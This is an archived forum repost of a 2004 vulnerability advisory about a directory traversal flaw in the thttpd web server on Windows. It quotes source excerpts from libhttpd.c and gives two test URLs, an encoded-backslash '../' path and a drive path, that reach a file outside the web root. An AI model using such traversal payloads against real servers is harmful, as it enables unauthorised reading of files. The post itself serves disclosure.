Help
-
Search
-
Member List
-
Calendar
Full Version:
Bug@thttpd
GovernmentSecurity.org
>
The Archives
>
Exploit Articles
qcred11
Aug 4 2004, 07:27 PM
QUOTE
Application: thttpd
Vendors:
http://www.acme.com/software/thttpd/
Version: 2.07 beta 0.4 10dec99
Platforms: Windows
Bug: Directory Traversal
Date: 2004-08-04
Author: CoolICE
e-mail: CoolICE#China.com
================
Content:
in libhttpd.c:
int
httpd_parse_request( httpd_conn* hc )
[...]
if ( hc->decodedurl[0] != '/' )
{
httpd_send_err( hc, 400, httpd_err400title, httpd_err400form, "" );
return -1;
}
static int
really_start_request( httpd_conn* hc )
[...]
if ( stat( hc->expnfilename, &hc->sb ) < 0 )
{
httpd_send_err( hc, 500, err500title, err500form, hc->encodedurl );
return -1;
}
------------------
TestCode:
http://localhost/%5c../test.ini
http://localhost/c:\test.ini
Source:
http://seclists.org/lists/bugtraq/2004/Aug/0034.html
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here
.
Invision Power Board © 2001-2005
Invision Power Services, Inc.
